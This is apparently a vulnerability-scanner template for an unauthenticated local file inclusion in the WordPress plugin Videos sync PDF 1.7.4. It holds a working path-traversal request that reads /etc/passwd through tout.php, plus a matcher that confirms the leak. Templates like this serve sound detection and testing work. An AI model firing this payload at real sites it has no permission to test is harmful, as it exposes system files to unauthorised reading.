id: video-synchro-pdf-lfi

info:
  name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion
  author: Hassan Khan Yusufzai - Splint3r7
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/50844
    - https://wordpress.org/plugins/video-synchro-pdf/
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
